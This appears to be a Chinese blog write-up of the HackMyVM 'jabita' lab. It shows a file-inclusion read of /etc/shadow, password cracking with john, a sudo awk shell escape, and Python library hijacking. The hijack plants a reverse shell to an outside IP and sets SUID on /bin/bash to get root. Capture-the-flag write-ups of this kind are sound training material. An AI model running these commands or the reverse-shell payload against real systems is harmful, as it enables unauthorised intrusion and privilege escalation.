jabita-python库劫持提权-suid

最新推荐文章于 2024-10-05 18:02:32 发布
最新推荐文章于 2024-10-05 18:02:32 发布
阅读量306 收藏
点赞数 9
分类专栏: HackMyVM 文章标签: python web安全 reverses suid提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/139780047
版权
jabitaeasy文件包含利用、shadow爆破、sudo-awk 提权、python库劫持提权、python反弹shell

主机发现

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth0 -r 192.168.44.139/24

服务探测

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.147

22, 80

目录扫描

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.44.147 -x php,html.txt.png -e

http://192.168.44.147/building   
在这个页面随便点个home
发现这个页面可能存在文件包含http://192.168.44.147/building/index.php?page=home.php
初次尝试得到结果
http://192.168.44.147/building/index.php?page=/etc/shadow

jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7::: 
jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1:19240:0:99999:7:::

john爆破

爆破

kali㉿kali)-[~/桌面/OSCP]
└─$ john -w=../rockyou.txt hash_jabita
账号:jack
密码:joaninha

提权

jack@jabita:~$ sudo -l
    (jaba : jaba) NOPASSWD: /usr/bin/awk

然后去这个网站搜索相关命令getshell,,,awk
GTFOBins

sudo awk 'BEGIN {system("/bin/sh")}'

jack@jabita:~$ sudo -u jaba  /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(jaba) gid=1002(jaba) groups=1002(jaba)

$ script /dev/null -c bash
jaba@jabita:/home/jack$ sudo -l
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py

查看这个文件为root 权限,该脚本导入了wild 模块,执行后调用first()方法,输出一个hello。
我们搜索该模块,查看模块内容如下

jaba@jabita:/home/jack$ cat /usr/bin/clean.py 
import wild

wild.first()
jaba@jabita:/home/jack$ ls -all /usr/bin/clean.py 
-rw-r--r-- 1 root root 26 Sep  5  2022 /usr/bin/clean.py
jaba@jabita:/home/jack$ /usr/bin/python3 /usr/bin/clean.py
Hello
jaba@jabita:/home/jack$ find / -type f -name "wild.py" 2>/dev/null
/usr/lib/python3.10/wild.py
jaba@jabita:/home/jack$ cat /usr/lib/python3.10/wild.py
def first():
        print("Hello")
jaba@jabita:/home/jack$ ls -all /usr/lib/python3.10/wild.py
-rw-r--rw- 1 root root 29 Sep  5  2022 /usr/lib/python3.10/wild.py

python库劫持

我们对改文件具有修改的权限,因此可以尝试python库劫持进行提取
那么接下来我们可以使用python反弹一个shell,代码如下

import os
def first():
	os.system("python3 -c \"import       os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.44.128',9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);\"")

jaba@jabita:/home/jack$ sudo -u root /usr/bin/python3 /usr/bin/clean.py

实战中,如果机器不出网,我们可以修改该脚本的内容,让它可以使用 SUID 执行 bash。或者直接创建一个root权限的账号。

import os
def first():	
	os.system("chmod u+s /bin/bash")

find / -perm -u=s -type f 2>/dev/null


jaba@jabita:/home/jack$ bash -p
bash-5.1# whoami
root

bash-5.1# cat user.txt 
2e0942f09699435811c1be613cbc7a39
bash-5.1# cat root.txt 
f4bb4cce1d4ed06fc77ad84ccf70d3fe
是乙太呀
关注
专栏目录
【PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在...1.解压提权脚本 2.执行make 3.执行./cve-2021-4034
Python 反弹shell后门用51CTO Blog绑定
weixin_33866037的博客
11-12 232
前言:仅做交流,仅做交流。 除了51CTO当然也可以用其他的媒介啦,比如微博,微信等。这里就用51CTO吧 思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件! 在说说什么是反弹S...
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
Linux提权手法总结以及 Linux提权exp集合
02-22
其次,SUID(Set-User-ID)程序提权是另一种常见的提权方式。SUID允许非特权用户以程序所有者的身份执行该程序,这在某些场景下是必要的,但也可能被恶意利用。例如,`passwd`、`sudo`等程序通常具有SUID权限,攻击...
权限提升-linux提权手法总结.zip
05-08
4. **环境变量攻击**:系统或程序中未过滤的环境变量可能导致提权,如`LD_PRELOAD`可用来注入恶意库。 5. **文件权限错误**:如果关键系统文件或目录的权限过于宽松,攻击者可能能修改或替换它们,达到提权目的。 ...
Python3 解释器
Java_fenxiang的博客
10-05 332
Linux/Unix的系统上,一般默认的 python 版本为 2.x,我们可以将 python3.x 安装在/usr/local/python3目录中。安装完成后,我们可以将路径/usr/local/python3/bin添加到您的 Linux/Unix 操作系统的环境变量中,这样您就可以通过 shell 终端输...
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 509
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python
遥感影像-实例分割数据集:iSAID 从切图到YOLO格式数据集制作详细介绍
GIS潮流
09-30 1457
开源数据集isaid标注包含实例分割,但是原始影像太大,很吃显存,一般显卡无法用原始影像直接训练,所以需要对影像进行裁剪,并生成对应的标签,因为想用yolo系列跑模型,所以将标签需要转为txt格式。
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
Mopes__的博客
10-01 437
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
Python编写的贪吃蛇小游戏
WwLK123的博客
10-03 517
Python编写贪吃蛇小游戏。
合并两个有序数组
Sudo_Wang的学习记录
09-30 453
我们可以使用双指针法从后向前遍历,避免将已经排序的数组打乱。这个方法的核心思路是从。的末尾开始填充较大的元素,因为末尾是用零填充的空闲区域,这样我们可以避免覆盖。这个方法能够高效地解决问题,并且符合进阶要求的 O(m + n) 复杂度。
yjs10——pandas的基础操作
元气少女硕硕子的博客
09-30 390
data = pd.机器学习datasalary")注意:1.是pd.read_cvs,不要顺手写成np.read_cvs2.路径的斜杠方向是/,不是\,如果直接从电脑粘贴路径,路径写法是\,要自己换成/
Python并发编程(1)——Python并发编程的几种实现方式
一点
10-03 1059
Python 并发编程是指在 Python 中编写能够同时执行多个任务的程序。并发编程在任何一门语言当中都是比较难的,因为会涉及各种各样的问题,在Python当中也不例外。Python 提供了多种方式来实现并发,包括多线程(threading)、多进程(multiprocessing)、异步编程(asyncio),以及一些高级用法concurrent.futures和第三方库如gevent。
如何用Python监控本股市的方法
全世界的博客
09-30 1280
量化交易,顾名思义,是通过数学模型和计算机算法来进行交易决策的一种交易方式。它不仅仅是简单的自动化交易,而是基于大量的历史数据和统计分析,通过算法来识别市场中的交易机会,并自动执行交易策略。量化交易的核心在于“量化”,即通过数据和模型来量化市场行为和交易机会。布林线(Bollinger Bands)是一种广泛使用的技术分析工具,由约翰·布林格(John Bollinger)在1980年代初开发。布林线策略的核心思想是通过计算股票价格的标准差来确定价格波动的上下限,从而判断股票的买入和卖出时机。
Python-函数与数据容器超详解
最新发布
qq_53706413的博客
10-05 1134
本文对Python中的函数基础使用,以及数据容器中的list(列表)、tuple(元组)、str(字符串)、set(集合)、dict(字典)进行详细的讲解,加深了我们对Python的理解,通过此篇的学习我们对Python的使用会更加的熟练!
Python】2. 变量和数据类型
QQ3447387928的博客
10-02 1027
a = 10a为变量名,当我们创建很多变量的时候,就可以用名字来区分变量为赋值号,表示把右边的数据放到左边变量空间中【注意】:变量名需要遵守变量命名规则。
Python画笔案例-071 绘制闪闪的红星
2402_83194310的博客
10-01 210
【代码】Python画笔案例-071 绘制闪闪的红星。
Python笔记 - 函数、方法和类装饰器
weixin_45411898的博客
10-02 1282
语法糖,就可以理解当前装饰器后面加一个()表示立即调用,其参数为装饰的目标对象(类、函数或者可调用的实例对象)装饰器的本质是一个可调用对象(函数,类)装饰器的输入是一个可调用对象(函数,类,可调用的实例对象)装饰器的输出是一个可调用对象(函数,类,可调用的实例对象)
curl 的suid 提权
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值